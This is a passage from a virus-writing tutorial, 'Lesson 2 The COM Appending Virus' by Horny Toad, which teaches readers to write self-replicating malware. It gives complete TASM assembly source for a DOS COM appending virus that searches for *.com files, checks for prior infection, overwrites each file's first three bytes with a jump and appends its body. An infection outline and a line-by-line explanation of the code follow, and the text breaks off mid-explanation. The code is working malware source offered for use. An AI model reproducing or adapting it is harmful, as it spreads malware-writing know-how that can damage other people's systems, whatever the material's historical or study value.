Lesson 2 The COM Appending Virus By Horny Toad In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the COM appending infector. This virus is a step up in that it infects the host program without destroying it. As the complexity of the virii increase, so do the concepts that pertain to them. With the overwriting virus, we weren't very concerned with the host program, the one that we were infecting, quite simply, because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to slightly modify it to hold the virus code and then be able to run itself. Therefore, with the appender, you really need to visualize what is happening with your virus code and the effects on the host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus, with EXE infectors, resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will through some windows programming your way and utterly confuse you. At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriting and com appenders. Understanding the basic concepts in virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp. I have decided to continue with the format that I used in the first lesson to describe this virus. Therefore, when you are coding in the future and need a quick explanation of a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors. In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the first lesson. I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment on each of them and what they do in the virus itself. I also will add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler. I suggest that you use it. It is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure that you know the format that your code has to be in. After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to completely explain the use of certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to understand the more difficult concepts once you need them. Otherwise, you will only get confused. Well, on with the virus. I will go ahead and give you a copy below of the basic COM appender, so that, throughout the tutorial, you can reference back to the basic skeleton code. During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code. code segment assume cs:code,ds:code org 100h start: db 0e9h,0,0 toad: call bounce bounce: pop bp sub bp,OFFSET bounce first_three: mov cx,3 lea si,[bp+OFFSET thrbyte] mov di,100h push di rep movsb move_dta: lea dx,[bp+OFFSET hide_dta] mov ah,1ah int 21h get_one: mov ah,4eh lea dx,[bp+comsig] mov cx,7 next: int 21h jnc openit jmp bug_out Openit: mov ax,3d02h lea dx,[bp+OFFSET hide_dta+1eh] int 21h xchg ax,bx rec_thr: mov ah,3fh lea dx,[bp+thrbyte] mov cx,3 int 21h infect_chk: mov ax,word ptr [bp+hide_dta+1ah] mov cx,word ptr [bp+thrbyte+1] add cx,horny_toad-toad+3 cmp ax,cx jz close_up jmp_size: sub ax,3 mov word ptr [bp+newjump+1],ax to_begin: mov ax,4200h xor cx,cx xor dx,dx int 21h write_jump: mov ah,40h mov cx,3 lea dx,[bp+newjump] int 21h to_end: mov ax,4202h xor cx,cx xor dx,dx int 21h write_body: mov ah,40h mov cx,horny_toad-toad lea dx,[bp+toad] int 21h close_up: mov ah,3eh int 21h next_bug: mov ah,4fh jmp next bug_out: mov dx,80h mov ah,1ah int 21h retn comsig db '*.com',0 thrbyte db 0cdh,20h,0 newjump db 0e9h,0,0 horny_toad label near hide_dta db 42 dup (?) code ENDS END start Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed. Outline of the COM Appending Virus 1. Determine the Delta Offset 2. Restore the infected file's original 3 bytes 3. Set a new DTA address 4. Find a COM file. 5. If none then go to step 16. 6. Open the file. 7. Read and store the first 3 bytes of the file. 8. Check if file has been previously infected. 9. Calculate the size of the jump to main virus body. 10. Move to the beginning of the file. 11. Write the jump to the main virus body. 12. Move to the end of the file. 13. Append the virus main body to the end of the file. 14. Close the file. 15. Find next matching file. Back to step 4. 16. Return the DTA to 80 hex and restore control to host program. I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before and after infection. Toad2 Virus Innocent Program 163 bytes 200 bytes ----------- ----------- = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ----------- ----------- After Infection 0ffset 100h --------------- =Jump to Virus= =Main Body = - 3 bytes long =-------------= = = The delta offset is the calculation = Innocent = of the amount of space that the virus = Program = main body has moved down past the Innocent = Main Body = program main body. = = = = =-------------= = = = Virus Main = = Body = = = = = = = =Data Section = =of Virus = =--Original---= =--3 bytes of-= =--Innocent---= =--Program----= =-------------= Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running. Well, lets have a look at the code. _____________________________________________________________________ code segment The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program will lie inside of the code segment. This segment does not necessarily have to be named "code" segment, but it is only logical, and a good programming convention, to name it the "code" segment. If we were dealing with a larger program, one that had many procedures of external calls, we would definitely want to define a specific segment as our data segment separate from the code. Since this is a very small piece of code, the two will be intermixed. _____________________________________________________________________ assume cs:code,ds:code The assume directive lies within the code segment and matches the name that you gave your segment, such as code, with associated register. In our program, we are stating that the code and data segment registers will be associated with the "code" segment. What does this mean? Basically we are still setting up the parameters of our COM file. We are following convention by defining where things are in our program and how they are set up. What are the CS and DS registers? The code segment register is going to contain the starting address of your programs code segment. . Essentially, it tells your computer where to begin to look for your executable code. The DS register contains the starting address for the data section. Another register that I might as well bring up is the IP or instruction pointer register. The job of the IP is to contain the offset address of the next line of code that is to be executed. What is an offset address? An offset address is not a true address of a line in your program, rather a value of the distance away from a given point. If you put two concepts together, the code segment register added to the instruction point register will give you the next executable line in your program. The CS will stay constant as the IP counts up the lines of code. _____________________________________________________________________ org 100h You should remember this from the overwriting virus. This directive is telling the computer that our virus is a COM file located at 100 hex or 256 bytes. This 100 hex distance is actually an offset directly after the PSP or program segment prefix. The value 100h is placed in the IP, telling the computer where to begin. PSP contains information about your program and is created in memory when the program is loaded _____________________________________________________________________ start: db 0e9h,0,0 The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want control to the next line of code, so we define a blank jump. The DB or "define byte" directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally defining an assembly instruction manually. The instruction that we are defining is "jump." At the lowest level, the level at which the computer processes code, the instruction "jmp" has been transformed by the compiler to it's binary form "11101001." In coding assembly, the preferred numerical system is hexadecimal, so we convert the binary to e9h. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me. Get back on track Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the jump instruction will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer. _____________________________________________________________________ toad: call bounce bounce: pop bp sub bp,OFFSET bounce The Delta Offset. This is probably the most singular important concept that you will have to learn when coding an appending virus. When you compile the virus for the first time, the assembler calculates the value of all of the offsets. Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated are now all incorrect. The offsets do not take into account the amount of space the code has moved forward, beyond the host program. Before we go into the calculation of the delta offset, lets look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like GOSUB. A call instruction pushes the IP onto the stack. Ok, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction merely transfers the data that was just pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack, a temporary memory location. On to the calculation. The call instruction pushes the IP, the address of the next instruction on to the stack. We then pop this address into the bp. Then subtract the original offset of bounce, which was determined at the virus' original compilation, from the value in bp. The ase
ointer is a 16 bit register used
for holding certain parameters, in this case, our delta
offset. All offset addresses in the main virus body will
need to have bp added on to them. During the first
generation of the virus, the delta offset, or the bp, will
be zero.
_____________________________________________________________________
first_three:
mov cx,3
lea si,[bp+OFFSET thrbyte]
mov di,100h
push di
rep movsb
The first_three routine writes the host program's original
three bytes back to it's original location (in memory) at
location 100 hex, the beginning of the program. The
instructions to do this are fairly simple and should look
somewhat familiar. What do the brackets with the